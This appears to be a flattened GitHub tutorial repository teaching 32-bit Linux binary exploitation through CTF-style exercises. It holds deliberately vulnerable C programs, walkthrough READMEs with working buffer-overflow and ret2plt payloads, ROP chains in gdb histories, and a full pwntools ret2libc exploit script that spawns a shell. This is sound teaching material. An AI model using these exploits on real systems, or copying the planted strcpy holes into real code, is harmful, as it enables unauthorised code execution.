├── intro-2
    ├── overflow1
    ├── overflow1.c
    └── README.md
├── exercise-1
    ├── overflow2
    ├── overflow2.c
    └── README.md
├── exercise-2
    ├── overflow
    ├── overflow.c
    └── README.md
├── exercise-3
    ├── overflow
    ├── overflow.c
    ├── .gdb_history
    └── README.md
├── exercise-4
    ├── libc.so.6
    ├── exercise-4
    ├── exercise-4.c
    ├── .gdb_history
    ├── soln_exercise-4.py
    └── README.md
├── intro-1
    ├── hello_world.bin
    ├── hello_world.c
    └── README.md
├── install.sh
├── exercise-3.5
    └── README.md
├── README.md
└── terms
    └── README.md


/intro-2/overflow1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Bretley/how2exploit_binary/HEAD/intro-2/overflow1


--------------------------------------------------------------------------------
/exercise-1/overflow2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Bretley/how2exploit_binary/HEAD/exercise-1/overflow2


--------------------------------------------------------------------------------
/exercise-2/overflow:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Bretley/how2exploit_binary/HEAD/exercise-2/overflow


--------------------------------------------------------------------------------
/exercise-3/overflow:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Bretley/how2exploit_binary/HEAD/exercise-3/overflow


--------------------------------------------------------------------------------
/exercise-4/libc.so.6:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Bretley/how2exploit_binary/HEAD/exercise-4/libc.so.6


--------------------------------------------------------------------------------
/exercise-4/exercise-4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Bretley/how2exploit_binary/HEAD/exercise-4/exercise-4


--------------------------------------------------------------------------------
/intro-1/hello_world.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Bretley/how2exploit_binary/HEAD/intro-1/hello_world.bin


--------------------------------------------------------------------------------
/intro-1/hello_world.c:
--------------------------------------------------------------------------------
1 | #include<stdio.h>
2 | 
3 | int main() {
4 |     printf("Hello World!\n");
5 | }
6 | 


--------------------------------------------------------------------------------
/exercise-4/exercise-4.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <string.h>
 3 | 
 4 | int main() {
 5 |     char msg[64] = "Joke's on you, there is no system!\n";
 6 |     char buf[64];
 7 |     write (1,&msg,strlen(msg));
 8 |     read(0,buf,256);
 9 |     return 0;
10 |     }
11 | 


--------------------------------------------------------------------------------
/exercise-4/.gdb_history:
--------------------------------------------------------------------------------
 1 | file exercise-4
 2 | disas main
 3 | b*main+194
 4 | r < <(python -c 'print "A"*140 + "\x7d\x84\x04\x08" + "A"*148')
 5 | x /150wx $esp
 6 | x /150wx $esp-0x40
 7 | x /150wx $esp+0x40
 8 | x /150wx $esp-0x40
 9 | x /150wx $esp-0x100
10 | q
11 | p &bss
12 | p &__bss_start
13 | info file
14 | p &__bss_start
15 | q
16 | 


--------------------------------------------------------------------------------
/exercise-1/overflow2.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <stdlib.h>
 3 | #include <string.h>
 4 | 
 5 | /* This never gets called! */
 6 | void give_shell(){
 7 |     gid_t gid = getegid();
 8 |     setresgid(gid, gid, gid);
 9 |     system("/bin/sh -i");
10 | }
11 | 
12 | void vuln(char *input){
13 |     char buf[16];
14 |     strcpy(buf, input);
15 | }
16 | 
17 | int main(int argc, char **argv){
18 |     if (argc > 1)
19 |         vuln(argv[1]);
20 |     return 0;
21 | }
22 | 


--------------------------------------------------------------------------------
/exercise-2/overflow.c:
--------------------------------------------------------------------------------
 1 | #include<stdio.h>
 2 | #include<stdlib.h>
 3 | #include<string.h>
 4 | 
 5 | int main(int argc, char **argv) {
 6 |     if (argc>1) {
 7 |         gid_t gid = getegid();
 8 |         setresgid(gid, gid, gid);
 9 |         printf("Good thing you don't have /bin/sh");
10 |         printf("\nGood luck getting a shell.\n");
11 |         system("echo You Lose!\n");
12 |         char buf[24];
13 |         strcpy(buf,argv[1]);
14 |         return 0;
15 |     }
16 |     else {
17 |         return 0;
18 |     }
19 | }
20 | 


--------------------------------------------------------------------------------
/install.sh:
--------------------------------------------------------------------------------
 1 | # Update first
 2 | apt-get -y update;
 3 | 
 4 | # Basic Programs that need installed
 5 | apt-get -y install gdb;
 6 | apt-get -y install gdbserver;
 7 | apt-get -y install git;
 8 | apt-get -y install python-dev;
 9 | apt-get -y install socat;
10 | apt-get -y install vim;
11 | apt-get -y install python-pip;
12 | apt-get -y install gcc-multilib;
13 | 
14 | pip install capstone;
15 | 
16 | # This shouldn't take 3 tries....
17 | pip install pwntools;
18 | pip install pwntools;
19 | pip install pwntools;
20 | 
21 | git clone https://github.com/longld/peda.git
22 | echo "source ~/peda/peda.py" >> ~/.gdbinit
23 | 


--------------------------------------------------------------------------------
/exercise-3/overflow.c:
--------------------------------------------------------------------------------
 1 | #include<stdio.h>
 2 | #include<string.h>
 3 | int main(int argc, char **argv) {
 4 |     putenv("PATH=");
 5 |     printf("I've broken up my system call!\n");
 6 |     printf("You think I've included what you need for this? You wish\n");
 7 |     char user_buf[64]= "";
 8 |     if (argc > 1) {
 9 |         strcpy(user_buf,argv[1]);
10 |     }
11 |     else {
12 |         printf("usage: ./overflow [input]\n");
13 |         return 0;
14 |         }
15 |     char buf1[10] = "/b";
16 |     char buf2[8] = "in/";
17 |     char buf3[5] = "date";
18 |     strcat(buf2,buf3);
19 |     strcat(buf1,buf2);
20 |     system(buf1);
21 |     printf("Aren't these string functions wonderful?\n");
22 |     return 0;
23 | }
24 | 


--------------------------------------------------------------------------------
/intro-2/overflow1.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <stdlib.h>
 3 | #include <string.h>
 4 | #include <unistd.h>
 5 | #include <sys/types.h>
 6 | #include "dump_stack.h"
 7 | 
 8 | void vuln(int tmp, char* str)
 9 | {
10 | 	int win = tmp;
11 | 	char buf[64];
12 | 	strcpy(buf, str);
13 | 	dump_stack((void**) buf, 23, (void**) &tmp);
14 | 	printf("win = %d\n", win);
15 | 
16 | 	if (win == 1) {
17 | 		execl("/bin/sh", "sh", NULL);
18 | 	} else {
19 | 		printf("Sorry, you lose.\n");
20 | 	}
21 | 
22 | 	exit(0);
23 | }
24 | 
25 | int main(int argc, char** argv)
26 | {
27 | 	if (argc != 2) {
28 | 		printf("Usage: stack_overwrite [str]\n");
29 | 		return 1;
30 | 	}
31 | 
32 | 	uid_t euid = geteuid();
33 | 	setresuid(euid, euid, euid);
34 | 	vuln(0, argv[1]);
35 | 	return 0;
36 | }
37 | 


--------------------------------------------------------------------------------
/exercise-4/soln_exercise-4.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | context(arch='i386', os='linux') # <-- Add the architecture and os
 3 | binary = ELF("exercise-4")
 4 | libc = ELF("libc.so.6")
 5 | 
 6 | write_plt = p32(binary.symbols["write"])
 7 | read_GOT = p32(binary.symbols["got.read"])
 8 | read_plt = p32(binary.symbols["read"])
 9 | bss_addr = p32(binary.symbols["__bss_start"])
10 | pop_ret = "\x9d\x85\x04\x08"
11 | 
12 | 
13 | r=process("./exercise-4")
14 | 
15 | """
16 | You can use these to test it as a server over localhost
17 | r=remote("127.0.0.1",1337)
18 | 
19 | 
20 | run this in a different terminal VVVV
21 | socat tcp-listen:1337,fork,reuseaddr exec:"strace ./exercise-4"
22 | """
23 | r.recvline()
24 | 
25 | exploit = "A"*140
26 | exploit += write_plt +pop_ret +  p32(1)+ read_GOT + p32(4) 
27 | exploit += p32(binary.symbols["main"])
28 | 
29 | r.sendline(exploit)
30 | addr_read = int(r.recv(4)[::-1].encode("hex"),16)
31 | r.recvline()
32 | libc_base = addr_read - libc.symbols["read"]
33 | system = p32(libc_base + libc.symbols["system"])
34 | binsh = p32(libc_base +  libc.search("/bin/sh").next())
35 | r.sendline("A"*148+ system + "RETN" + binsh + binsh) # <- 148?????? why 148?
36 | r.interactive()
37 | 


--------------------------------------------------------------------------------
/exercise-3/.gdb_history:
--------------------------------------------------------------------------------
 1 | fin sh
 2 | b*main
 3 | r
 4 | find sh
 5 | find sh binary
 6 | file overflow
 7 | cler
 8 | clear
 9 | dumprop binary
10 | ropsearch binary
11 | b*main
12 | r
13 | ropsearch binary
14 | ropsearch
15 | ropsearch ""
16 | ropsearch "pop"
17 | ropsearch ""
18 | ropsearch binary1
19 | q
20 | clear
21 | b*main
22 | r
23 | clear
24 | dumprop
25 | ropsearch "" 
26 | clear
27 | find /b
28 | p strcpy
29 | checksec
30 | q
31 | p bss
32 | info address __bss_start 
33 | q
34 | q
35 | find "/b" binary
36 | b*main
37 | r
38 | find "/b" binary
39 | find "in/" binary
40 | find "sh" binary
41 | ropsearch "" binary
42 | b*main
43 | r
44 | ropsearch "" binary
45 | ropsearch "" binary | grep pop
46 | ropsearch "" binary 
47 | set arg $(python -c 'print "A"*76 + "\x60\x83\x04\x08" + "\x2c\xa0\x04\x08" + "\x9e\x85\x04\x08" + "\x50\x83\x04\x08" + "\x2c\xa0\x04\x08" + "\x2c\xa0\x04\x08" + "\x29\x95\x04\x08"  + "\x50\x83\x04\x08" + "\x50\x83\x04\x08" + "\x2c\xa0\x04\x08" + "\x96\x86\x04\x08"+ "\x80\x83\x04\x08" + "JUNK" + "\x2c\xa0\x04\x08"')
48 | b*main
49 | r
50 | ni
51 | q
52 | file overflow
53 | find /b binary
54 | b*main 
55 | r
56 | find /b binary
57 | find in/ binary
58 | find sh binary
59 | q
60 | file overflow
61 | info addr __bss_start 
62 | zdq
63 | q
64 | q
65 | q
66 | clear
67 | ls
68 | clear
69 | q
70 | b*main
71 | r
72 | ropsearch "" binaru
73 | ropsearch "" binary
74 | clear
75 | clear
76 | ls
77 | find "/b" binary
78 | find "in/" binary
79 | find "sh" binary
80 | ropsearch "" binary
81 | dd
82 | q
83 | b*main
84 | r
85 | celar
86 | ls
87 | ropsearch "" binary
88 | q
89 | clear
90 | ls
91 | clear
92 | q
93 | 


--------------------------------------------------------------------------------
/exercise-3.5/README.md:
--------------------------------------------------------------------------------
 1 | # pwntools Overview
 2 | 
 3 | **Documentation: https://pwntools.readthedocs.io**
 4 | 
 5 | First things first:
 6 | 
 7 | ```python
 8 | from pwn import *
 9 | ```
10 | 
11 | That's just a generic import statement.
12 | 
13 | ```python
14 | context(arch='i386', os='linux')
15 | ```
16 | 
17 | This just sets the context for other functions that we'll describe later.
18 | 
19 | ```python
20 | binary = ELF("some_challenge")
21 | libc = ELF("some_libc")
22 | ```
23 | 
24 | This part adds two ELF objects, binary and libc. ELF objects are supremely useful -- they give you access to a wide array of methods and data fields. I almost always have both of these lines in my script, even if the libc one is commented out.
25 | 
26 | ```python
27 | r = process("./some_challenge")
28 | ```
29 | 
30 | This simply executes the challenge (in the same directory.)
31 | 
32 | Alternatively:
33 | 
34 | ```python
35 | r = remote("127.0.0.1",1337) #<-- Replace with actual HOST,PORT
36 | ```
37 | 
38 | will run it remotely (many CTFs will not give you a full shell, just a host and
39 | a port to connect to the binary.)
40 | 
41 | Many of you will remember taking adresses and turning them into python
42 | escape sequences by hand.
43 | 
44 | If the address of the `write()` function is `0xdeadbeef`, the escaped address for `write()` would be `\xef\xbe\xad\xde`.
45 | 
46 | `pwntools` can take care of this for us!
47 | 
48 | ```python
49 | write = p32(binary.symbols["write"])
50 | ```
51 | 
52 | This "packs" (converts to the escape seqence, sort of) the address of `write()` for us on a 32 bit machine. `p64()` also exists, for 64 bit machines. Another thing to be cognizant of is the difference between Big and Little Endian memory encoding. Make sure you know what format the system you're writing an exploit for is using.
53 | 
54 | Assuming `r` is an instantiated process or remote, you can now use these methods to communicate with the binary.
55 | 
56 | ```python
57 | r.sendline("This sends a string with a newline appended to the end")
58 | r.send("This also sends a string")
59 | ```
60 | 
61 | Reading this information is one thing. Getting real experience is another.
62 | **At this point I would strongly recommend solving the first 3 challenges using pwntools.**
63 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # how2exploit_binary: get your hack on.
 2 | 
 3 | ### A note from the creator
 4 | 
 5 | Greetings, fellow hacker, hobbyist, or computer enthusiast. If you've been
 6 | looking for a place to start learning binary exploitation, then you're in luck.
 7 | This tutorial is intended for anyone with experience in coding, ideally C or
 8 | C++, but I only knew Python when I started.
 9 | 
10 | Written by someone who is just barely better than "incompetent," I'll be
11 | explaining how I learned my skills. These tutorials will be a bit long winded,
12 | but hopefully they will be informative and entertaining. Please feel free to
13 | contact me about any clarifications that should be included in the tutorials.
14 | 
15 | **This is intended for Linux. It's free if you don't already have it. Don't
16 | want to dual boot? Get a VM.**
17 | 
18 | -Best of luck
19 | 
20 | [Bretley](https://github.com/Bretley)
21 | 
22 | ## The Grand Glossary of Terms
23 | 
24 | I've compiled this list of as many useful things as I could find. It contains
25 | all sorts of goodies that I wish I had found or had explained to me earlier. If
26 | you have a question, it can probably be answered in here. Otherwise, get your
27 | Google-Fu on
28 | 
29 | * [The Glossary](terms)
30 | 
31 | ## External Tools.
32 | 
33 | I strongly recommend you install and use the following tools to make your life
34 | a bit easier:
35 | 
36 | * [longld/peda](https://github.com/longld/peda/): I use this tool in all of
37 |   these tutorials. It provides a wide range of useful functions and makes `gdb`
38 |   far more user friendly. Just follow the installation instructions in the repo.
39 | 
40 | * [Gallopsled/pwntools](https://github.com/Gallopsled/pwntools): pwntools is an
41 |   exploit framework built in my favorite language, python. It has a whole slew
42 |   of useful functions and chicanery that makes the exploit process more fun and
43 |   less painful. Install with: `$ sudo pip install pwntools`
44 | 
45 | ## Introductory Tutorials:
46 | 
47 | * [Setup Script](./install.sh)
48 | * [Intro 1: What is a binary, really?](intro-1)
49 |     * [Companion Video](https://youtu.be/6cNbKnxbAWw)
50 |     * [Areece x86 Calling Conventions](http://codearcana.com/posts/2013/05/21/a-brief-introduction-to-x86-calling-conventions.html)
51 | * [Intro 2: Screwing around with the stack](intro-2)
52 | 
53 | ## Buffer Overflows and ROP:
54 | 
55 | * [1:   The power of SEGFAULT](exercise-1)
56 | * [2:   Build your own `system()`](exercise-2)
57 | * [3:   Follow the Yellow Brick Functions](exercise-3)
58 | * [3.5: Learning pwntools](exercise-3.5)
59 | * [4:   Pay a Visit to Your Local Library](exercise-4)
60 | 
61 | ## Heap Exploitation:
62 | 
63 | * More to come here soon ;)
64 | 


--------------------------------------------------------------------------------
/terms/README.md:
--------------------------------------------------------------------------------
 1 | # Glossary of Terms
 2 | 
 3 | Note: If you have a term you'd like added to the list, add an Issue or open a Pull Request.
 4 | 
 5 | ## Technical Terms
 6 | 
 7 | * **ASLR (Address Space Layout Randomization):** Security measure in modern OSes to randomize stack and libc addresses on each program execution.
 8 | 
 9 | * **Binary:** A binary is the output file from compiling a C or C++ file. Anything in the
10 | binary has a *constant address* (usually... see PIE.)
11 | 
12 | * **Canary:** A canary is some (usually random) value that is used to verify that
13 | nothing has been overrwritten. Programs may place canaries in memory, and
14 | check that they still have the exact same value after running potentially
15 | dangerous code, verifying the integrity of that memory.
16 | 
17 | * **GOT (Global Offset Table):** The GOT is a table of addresses stored in the data section of memory. Executed programs use it to look up the runtime addresses of global variables that are unknown at compile time.
18 | 
19 | * **Heap:** The heap is a far more reliable memory space similar to the stack.
20 | However, usage of the heap has to be invoked by the coder, so heap problems are
21 | often their own category of exploitation
22 | 
23 | * **libc:** A binary is *dynamically linked* and has a libc file. This means that
24 | the whole set of standard library functions are located somewhere in the memory used
25 | by the program.
26 | 
27 | * **NX (Non-Executable):** Security measure in modern OSes to separate processor instructions (code) and data (everything that's not code.) This prevents memory from being both executable and writable.
28 | 
29 | * **PIE (Position Independent Executable):** Essentially ASLR, but for the binary itself.
30 | When this protection is enabled, locations of actual code in the binary are randomized.
31 | 
32 | * **PLT (Procedure Linkage Table):** The PLT is essentially a wrapper function for all
33 | functions directly called in the binary. *Only used in dynamically
34 | linked binaries*.
35 | 
36 | * **ROP (Return Oriented Programming):** Reusing tiny bits of code throughout the binary to construct commands we want to execute.
37 | 
38 | * **Stack:** The stack is part of the memory for a binary. Local variables and
39 | pointers are often stored here. The stack can be randomized.
40 | 
41 | 
42 | ## Important Functions to Watch Out For:
43 | 
44 | TODO: ADD MORE.
45 | 
46 | * `mprotect()`: This is the function responsible for setting page pivilieges. If
47 | you can call this function with your own arbitrary arguments, you can
48 | effectively bypass NX protection.
49 | 
50 | * `system()`: This function can be used to execute commands or even other
51 | binaries if called properly. I think it defaults to sh to handle commands on
52 | most Linux flavors.
53 | 
54 | ## General Terms
55 | 
56 | * **Arbitrary:** This word is used to imply the fullness of control that you
57 | might have given an exploit. If you've achieved *arbitrary code execution*, that means you can run, read, or write whatever commands you choose.
58 | 
59 | * **Reliable:** Reliable in the context of binary exploitation is almost exactly
60 | the same as regular use. An exploit is said to be reliable if it works across
61 | different runs consistently. It might seem dumb to define this work, but
62 | somtimes with exploits you will only have the option to make an unreliable
63 | exploit.
64 | 


--------------------------------------------------------------------------------
/intro-1/README.md:
--------------------------------------------------------------------------------
 1 | # Intro 1: What is a binary, really?
 2 | 
 3 | In short, a binary is the output file that the computer can actually run when you compile high level code, such as C or C++. I believe in hands on learning, so we can take a look inside one to really find out.
 4 | 
 5 | Consider the file [hello_world.c](hello_world.c):
 6 | ```C
 7 | # include<stdio.h>
 8 | int main() {
 9 |     printf("Hello World!\n");
10 | }
11 | ```
12 | 
13 | This is your average C file, more or less. It's got a main function, some includes, and a little bit of code to be run. However, your computer can't actually run it. In order to make it usable, we must compile it:
14 | 
15 | ```shell
16 | $ gcc -m32 hello_world.c -o hello_world.bin
17 | ```
18 | 
19 | You can ignore the `-m32` argument (we'll talk about it later), but the `-o hello_world.bin` simply specifies what the name of the output file is going to be.
20 | 
21 | From here, we can execute it:
22 | 
23 | ```shell
24 | $ ./hello_world.bin
25 | Hello World!
26 | ```
27 | 
28 | Unsurprisingly, we get `"Hello World!"` as output. But let's go a bit deeper. We can open `gdb (GNU Debugger)` and see what's happening under the hood:
29 | 
30 | ```gdb
31 | $ gdb -q ./hello_world.bin
32 | Reading symbols from ./hello_world.bin...(no debugging symbols found)...done.
33 | gdb-peda$ disas main
34 | Dump of assembler code for function main:
35 |    0x0804841d <+0>:     push   %ebp
36 |    0x0804841e <+1>:     mov    %esp,%ebp
37 |    0x08048420 <+3>:     and    $0xfffffff0,%esp
38 |    0x08048423 <+6>:     sub    $0x10,%esp
39 |    0x08048426 <+9>:     movl   $0x80484d0,(%esp)
40 |    0x0804842d <+16>:    call   0x80482f0 <puts@plt>
41 |    0x08048432 <+21>:    leave
42 |    0x08048433 <+22>:    ret
43 | End of assembler dump.
44 | gdb-peda$ quit
45 | ```
46 | 
47 | Your prompt probably looks like `(gdb)`, whereas mine is `gdb-peda$`. Don't worry about this, my gdb is modified.
48 | 
49 | The weird code that `gdb` displayed is called assembly language. It's the lowest level human readable code out there. Each line maps directly to a machine instruction. Let's break this down.
50 | 
51 | ```asm
52 | 0x0804841d <+0>:     push   %ebp
53 | 0x0804841e <+1>:     mov    %esp,%ebp
54 | 0x08048420 <+3>:     and    $0xfffffff0,%esp
55 | 0x08048423 <+6>:     sub    $0x10,%esp
56 | ```
57 | 
58 | The hex numbers you see on the left are addresses. You can think of these just like your house address: `0x0804841d` is where the instruction `push   %ebp` lives. These first four instructions are just conventions for a function, in this case `main()`.
59 | 
60 | ```asm
61 | 0x08048426 <+9>:     movl   $0x80484d0,(%esp)
62 | 0x0804842d <+16>:    call   0x80482f0 <puts@plt>
63 | ```
64 | 
65 | These instructions are what actually print out `"Hello World!"`. The program moves the address of the string `"Hello World!"` into the memory address that `%esp` points to. `%esp` is a register, which you can think of as a special place the processor uses for storing values it needs quick access to. Each register can hold up to four bytes, usually some memory address. Our program then calls the `puts()` function, which prints out whatever is at the address we supplied.
66 | 
67 | ```asm
68 | 0x08048432 <+21>:    leave
69 | 0x08048433 <+22>:    ret
70 | ```
71 | 
72 | The last two instructions return control from our `main()` function back to the C library, which then does some clean up and exits the program. We'll be learning more about how these binaries function in later tutorials.
73 | 


--------------------------------------------------------------------------------
/exercise-1/README.md:
--------------------------------------------------------------------------------
 1 | # The power of SEGFAULT
 2 | 
 3 | **Credit to [PicoCTF 2013](2013.picoctf.com) for problem**
 4 | 
 5 | Consider our file for this exercise [overflow2.c](overflow2.c):
 6 | 
 7 | ```C
 8 | #include <stdio.h>
 9 | #include <stdlib.h>
10 | #include <string.h>
11 | 
12 | /* This never gets called! */
13 | void give_shell(){
14 |     gid_t gid = getegid();
15 |     setresgid(gid, gid, gid);
16 |     system("/bin/sh -i");
17 | }
18 | 
19 | void vuln(char *input){
20 |     char buf[16];
21 |     strcpy(buf, input);
22 | }
23 | 
24 | int main(int argc, char **argv){
25 |     if (argc > 1)
26 |         vuln(argv[1]);
27 |     return 0;
28 | }
29 | ```
30 | 
31 | Looking at the code for this program, you'll see the function `strcpy()` is called with our argument as a parameter. Since there are no size checks on our input, we can try to manipulate the stack just like before. You'll notice that there is no way `give_shell()` gets called. Not yet at least ;)
32 | 
33 | ```
34 | $ ./overflow2 $(python -c 'print "A"*24')
35 | Segmentation fault (core dumped)
36 | ```
37 | 
38 | Segmentation fault? What's this? Simply put, a segmentation fault simply means that the program tried to access an address that isn't there. Let's use `strace` to see what's really happening.
39 | 
40 | ```
41 | $ strace ./overflow2 $(python -c 'print "A"*32')
42 | ...
43 | ...
44 | --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x41414141} ---
45 | ```
46 | 
47 | The address in question is `0x41414141`, or four "A"s. What does this mean? Consider the disassembly of the function `vuln()`, as well as `main()` where it's called.
48 | 
49 | ```
50 | $ gdb -q ./overflow2
51 | Reading symbols from ./overflow2...(no debugging symbols found)...done.
52 | gdb-peda$ disas main
53 | ...
54 |    0x08048516 <+26>:   call   0x80484e2 <vuln>
55 |    0x0804851b <+31>:    mov    $0x0,%eax
56 | ...
57 | gdb-peda$ disas vuln
58 | Dump of assembler code for function vuln:
59 |    0x080484e2 <+0>: push   %ebp
60 |    0x080484e3 <+1>: mov    %esp,%ebp
61 |    0x080484e5 <+3>: sub    $0x28,%esp
62 |    0x080484e8 <+6>: mov    0x8(%ebp),%eax
63 |    0x080484eb <+9>: mov    %eax,0x4(%esp)
64 |    0x080484ef <+13>:    lea    -0x18(%ebp),%eax
65 |    0x080484f2 <+16>:    mov    %eax,(%esp)
66 |    0x080484f5 <+19>:    call   0x8048360 <strcpy@plt>
67 |    0x080484fa <+24>:    leave
68 |    0x080484fb <+25>:    ret
69 | End of assembler dump.
70 | ```
71 | 
72 | You might remember from [Intro 2](../intro-2) that you can overwrite values on the stack with a `strcpy()` vulnerability. In the lines of `main()`, control is passed to the function `vuln()`. However, `vuln()` needs to know where to return to in `main()` when it finishes. This is called a return address. In this case, `vuln()` should jump back to `0x0804851b`, the instruction right after `main()` calls `vuln()`. When we get a SEGFAULT that we control, that means that we've overwritten the return address. What can we do with this? The possibilities are pretty much endless. You have control over the code's flow, so maybe we can call some other function, namely `give_shell()`.
73 | 
74 | ```
75 | $ objdump -d overflow2 | grep give_shell
76 | 080484ad <give_shell>:
77 | ```
78 | 
79 | Now that we have the address of a useful function, let's see if we can supply *our own* return address. First, as you may remember from the last tutorial, some of these characters aren't printable. We'll need to convert it to an escape sequence and reverse the order, leaving us with this: `"\xad\x84\x04\x08"`. Now we can substitute it in!
80 | 
81 | ```
82 | $ ./overflow2 $(python -c 'print "A"*28 + "\xad\x84\x04\x08"')
83 | $ ls
84 | overflow2  overflow2.c  README.md
85 | ```
86 | 
87 | We now have a shell!
88 | 


--------------------------------------------------------------------------------
/exercise-2/README.md:
--------------------------------------------------------------------------------
 1 | # Build your own `system()`
 2 | 
 3 | Well, life is tough. Unlike in the first overflow exercise, there's no included function that you can call to get a shell. But let's try and get a shell anyways.
 4 | 
 5 | ```C
 6 | # include<stdio.h>
 7 | # include<stdlib.h>
 8 | # include<string.h>
 9 | 
10 | int main(int argc, char **argv) {
11 |     if (argc>1) {
12 |         gid_t gid = getegid();
13 |         setresgid(gid, gid, gid);
14 |         printf("Good thing you don't have /bin/sh");
15 |         printf("\nGood luck getting a shell.\n");
16 |         system("echo You Lose!\n");
17 |         char buf[24];
18 |         strcpy(buf,argv[1]);
19 |     }
20 |     return 0;
21 | }
22 | ```
23 | 
24 | Now unlike the last problem, you might notice that there is no call to `system("/bin/sh")`. This means we're going to have to be a bit more clever.
25 | 
26 | Let's take a look at the disassembly to learn a bit more about `system()`
27 | 
28 | ```gdb
29 | $ gdb -q ./overflow
30 | Reading symbols from ./overflow...(no debugging symbols found)...done.
31 | gdb-peda$ disas main
32 | Dump of assembler code for function main:
33 | ...
34 |    0x0804853c <+47>:   call   0x8048400 <setresgid@plt>
35 |    0x08048541 <+52>:    movl   $0x8048620,(%esp)
36 |    0x08048548 <+59>:    call   0x8048390 <printf@plt>
37 |    0x0804854d <+64>:    movl   $0x8048642,(%esp)
38 |    0x08048554 <+71>:    call   0x80483c0 <puts@plt>
39 |    0x08048559 <+76>:    movl   $0x804865e,(%esp)
40 |    0x08048560 <+83>:    call   0x80483d0 <system@plt>
41 | ```
42 | 
43 | Now what is `system@plt`? This is a crucial part. This binary is dynamically linked. This means that the binary makes calls to an actual libc file that gets put into memory. Luckily for us, dynamically linked binaries have PLT stubs. Since ASLR randomizes libc addresses as well, the binary needs some way to reliably call the functions it uses. The PLT is a wrapper function for the actual code in libc. **The PLT is a part of the binary, it's address doesn't change.** If you call `system@plt`, you'll call `system()`. So how are we going to do this? Since the PLT is a part of the binary, we'll use `objdump`.
44 | 
45 | ```objdump
46 | $ objdump -d overflow | grep system
47 | 080483d0 <system@plt>:
48 |  8048560:   e8 6b fe ff ff          call   80483d0 <system@plt>
49 | ```
50 | 
51 | Now let's try to break the binary.
52 | 
53 | ```salt
54 | $ strace ./overflow $(python -c 'print "A"*44')
55 | ...
56 | --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x41414141} ---
57 | ```
58 | 
59 | We get control of `$eip` after 40 bytes. `$eip` is the instruction pointer register. This is the same as overwriting a return value. It simply means that we have control over the control flow. Now let's supply our address.
60 | 
61 | ```shell
62 | ./overflow $(python -c 'print "A"*40 + "\xd0\x83\x04\x08"')
63 | Good thing you don't have /bin/sh
64 | Good luck getting a shell.
65 | You Lose!
66 | sh: 1: ������: not found
67 | Segmentation fault (core dumped)
68 | ```
69 | 
70 | Now this is really weird. What happened here is that we called `system()`. We didn't provide any arguments for `system()` so it just pulled some junk from the stack. Calling a function in an exploit has to take this form:
71 | 
72 | \[address of function\] \[return address\] \[argument\]
73 | 
74 | Now when the programmer wrote this, (I wrote this one :P) he thought he could be smart and make fun of you for not having a `"/bin/sh"` string. However, he didn't realize that by including that string in the code, the string is in the binary. We can use `gdb` to find the string!
75 | 
76 | ```gdb
77 | $ gdb -q ./overflow
78 | Reading symbols from overflow...(no debugging symbols found)...done.
79 | gdb-peda b*main
80 | Breakpoint 1 at 0x804850d
81 | gdb-peda$ r
82 | Breakpoint 1, 0x0804850d in main ()
83 | gdb-peda$ find /bin/sh
84 | Searching for '/bin/sh' in: None ranges
85 | Found 3 results, display max 3 items:
86 | overflow : 0x804863a ("/bin/sh")
87 | overflow : 0x804963a ("/bin/sh")
88 |     libc : 0xf7f82a24 ("/bin/sh")
89 | ```
90 | 
91 | Now you'll notice that two of these are in the binary. I'll just pick the first one and run with it. Finally, our finished exploit looks like so:
92 | 
93 | ```shell
94 | ./overflow $(python -c 'print "A"*40 + "\xd0\x83\x04\x08" + "FAKE" +
95 | "\x3a\x86\x04\x08"')
96 | ```
97 | 


--------------------------------------------------------------------------------
/intro-2/README.md:
--------------------------------------------------------------------------------
  1 | # Intro  2: Screwing around with the stack.
  2 | 
  3 | **Credit to [Picoctf 2013](2013.picoctf.com) for the binary and source used here.**
  4 | 
  5 | Now that you've gotten your feet wet with binaries, it's time to dive in to exploitation with the stack. Consider the file [overflow1.c](overflow1.c)
  6 | 
  7 | ```C
  8 | #include <stdio.h>
  9 | #include <stdlib.h>
 10 | #include <string.h>
 11 | #include <unistd.h>
 12 | #include <sys/types.h>
 13 | #include "dump_stack.h"
 14 | 
 15 | void vuln(int tmp, char *str) {
 16 |     int win = tmp;
 17 |     char buf[64];
 18 |     strcpy(buf, str);
 19 |     dump_stack((void **) buf, 23, (void **) &tmp);
 20 |     printf("win = %d\n", win);
 21 |     if (win == 1) {
 22 |         execl("/bin/sh", "sh", NULL);
 23 |     } else {
 24 |         printf("Sorry, you lose.\n");
 25 |     }
 26 |     exit(0);
 27 | }
 28 | 
 29 | int main(int argc, char **argv) {
 30 |     if (argc != 2) {
 31 |         printf("Usage: stack_overwrite [str]\n");
 32 |         return 1;
 33 |     }
 34 | 
 35 |     uid_t euid = geteuid();
 36 |     setresuid(euid, euid, euid);
 37 |     vuln(0, argv[1]);
 38 |     return 0;
 39 | }
 40 | ```
 41 | 
 42 | You can tell just by reading through this file that the obvious objective here is to make `win == 1` a true statement, but we're going to ignore that for a few minutes to learn about the stack. The stack is dynamic memory that the program uses to store addresses, arguments, and all sorts of other goodies.
 43 | 
 44 | Here's an example stack dump:
 45 | 
 46 | ```salt
 47 | $ ./overflow1-3948d17028101c40
 48 | Usage: stack_overwrite [str]
 49 | $ ./overflow1-3948d17028101c40 AAAA
 50 | Stack dump:
 51 | 0xffd48bf4: 0xffd4a89b (second argument)
 52 | 0xffd48bf0: 0x00000000 (first argument)
 53 | 0xffd48bec: 0x0804870f (saved eip)
 54 | 0xffd48be8: 0xffd48c18 (saved ebp)
 55 | 0xffd48be4: 0xf7720000
 56 | 0xffd48be0: 0xf762caa7
 57 | 0xffd48bdc: 0x00000000
 58 | 0xffd48bd8: 0xffd48c44
 59 | 0xffd48bd4: 0xf7744500
 60 | 0xffd48bd0: 0xffd48c18
